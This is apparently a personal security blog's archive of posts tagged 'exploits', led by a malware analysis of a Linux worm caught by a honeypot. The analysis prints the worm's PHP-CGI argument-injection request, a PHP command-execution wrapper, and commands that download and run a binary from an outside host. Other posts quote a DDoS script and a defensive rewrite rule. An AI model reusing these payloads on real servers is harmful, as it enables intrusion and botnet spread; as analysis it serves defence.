Posts Tagged ‘exploits’

linux binary

Tuesday, November 12th, 2013

Recently my nepenthes stopped working. Looking into the last log – lines I found a wget – line:

[12112013 06:25:07 debug info fixme] File info submitted (ebee4228eb3443cd
8d55228733b8c1c6, http://www.gpharma.co/x86)

So I took a a look at this binary which I could download from this location.

# file x86
x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Next look: try “strings”:

first nothing new.. but then I saw:

/proc/self/exe
POST
?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%6
4+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%
73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%
75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%
72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%
65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%
5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%
74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
<?php
$disablefunc = @ini_get(“disable_functions”);
if (!empty($disablefunc))
$disablefunc = str_replace(” “,””,$disablefunc);
$disablefunc = explode(“,”,$disablefunc);

What the heck..? And who is “zollard”?

 

#### Update  ####

The POST Part resolves to:

?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions=”” -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

###############

 

further on:

function myshellexec($cmd)
global $disablefunc;
$result = “”;
if (!empty($cmd))
if (is_callable(“exec”) and !in_array(“exec”,$disablefunc)) {exec($cmd,$
result); $result = join(“n”,$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable(“system”) and !in_array(“system”,$disablefunc)) {$v
= @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_content
s(); @ob_clean(); echo $v;}
elseif (is_callable(“passthru”) and !in_array(“passthru”,$disablefunc))
{$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_c
ontents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,”r”)))
$result = “”;
while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp);
return $result;
myshellexec(“wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x
86”);
myshellexec(“chmod +x /tmp/x86”);
myshellexec(“/tmp/x86”);

Now the binary loads another binary, executes it and starts a webserver?

myshellexec(“wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x
86”);
myshellexec(“chmod +x /tmp/x86”);
myshellexec(“/tmp/x86”);
HTTP/1.1 200 OK
httpd

A few lines more: It installes “iptables”, droppes every telnet connection ands starts

its own telnet-daemon:

insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp –dport 23 -j DROP
iptables -A INPUT -p tcp –dport 23 -j DROP
telnetd

In the end the program destroys its sources (rm -rf)  and runs in

mkdir -p
/var/run/.zollard/

The last lines:

chmod +x
cp /bin/sh
1234
12345
dreambox
smcadmin
stemroot
0!0
SHA1

So it ends up with some kind of crypto..

Virustotal shows a hitrate of 2 out of 47,  well, it is no windows binary..

Anyone seen this before? Who is zollard? Where did the binary got the necessary root-credentials

from?  I guess I have to take a further look..

 

###

Update

There were quite a lot of download-trials today:

# grep gpharma nepenthes.log | wc -l
33348

which is from the log-lines:

[12112013 09:23:43 debug info fixme] File info submitted (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)
[12112013 09:23:43 debug info fixme] File upload requested (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)

 

#### Update 2 ###

 

I executed the script on a linux vmware after adding “o+x” rights to the binary.

The iptables lines generate errors:

error inserting … ip_tables.ko – Unknown symbol in module

 

Immediatly the machine starts exchanging traffic with 117.201.16.108 : 58455

ans starts also listening on this port 58455

Looks like my machine started scanning the ip-range 117.201.16.* on that port –

I receive answers from there…  No httpd oder telnetd daemons are listening in “ps”, which I expected.

The command “pstree” shows a httpd, though! Different childrens  are running, the last one has a connection

to 117.201.18.22..23..24.. Looks like the “ps”executable has been changed.

Will see, what else can be found. Now it is “St. Martin” – time..:-)

 

 

 

 

 

 

 

 

 

DDoS PHP-Script

Tuesday, December 18th, 2012

Just recently the BSI warned about an ongoing attack to US Banks.
The php-script involved showed a “404” Error when called without any
arguments.

A closer looks shows a “404 Not Foun derror” WITH the typo in it.
Now we have a neat string to search for in google or wherever..
and bingo: some other victom already posted the source code
of the infected webserver:

 

Here we can see that a POST action “stop” makes the DDoS go away..


function stoped()
{
@unlink($base."stmdu.php");
@unlink($base."stp.hp");
cmdexec("killall ping;");
print "Stop & Clean";
}

And here is where the typo sits:


if(md5(md5(md5($_REQUEST['pass'])))!=$pass_up and $_SESSION['LoGiN']!=true)
{
print "404 Not Found

Not Found

The requested URL ".$_SERVER['PHP_SELF']." was not found on this server

Additionally, a 404 Not Foun derror was encountered while trying to use an Error Document to handle the request

";
die();
exit();
}

 

 

good website

Thursday, September 27th, 2012

Found an interesting website dealing with malware-analysis:

http://websiteanalystsresource.wordpress.com/

Seems like a good source for information.

php-bug

Friday, May 4th, 2012

If you run PHP in cgi-mode you are probably vulnerable to a newly found bug:
Heise: Gefahr-durch-offene-PHP-Luecke
Adding parameters like http://localhost/index.php?-s to an url can show the source code or even inject or run parametes in the shell.

Until an update exists it might be wise to filter out some string-elements (like “-” without “=”)
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]

bind 9 *again* vulnerable

Thursday, November 17th, 2011

Shortly after the last remote DoS vulnerability of bind 9 ISC announced another possibilty to crash a server (this time only on recursive resolvers). See CVE-2011-4313 for more infos.

Beef

Saturday, May 8th, 2010

On the last meeting of the AK Sicherheit (ECO Verband) we could see a live demo
of the tool Beef (Browser Exploitation Framework). Nice to see that XSS-attacks
(cross-site-scripting) is not only a nice POP-UP window, but is indeed a real attack
vector for anyone.
Try yourself, the software can be downloaded from www.bindshell.net

Nikto

Wednesday, October 21st, 2009

A post in Full Disclosure reminded me of Nikto,
a security tool for webservices. Based on libwhisker it tests a whole lot of possible bugs
in a webserver/application. Works nice .. just wondering why it says spamversand.de runs on Microsoft IIS 5/0 ..?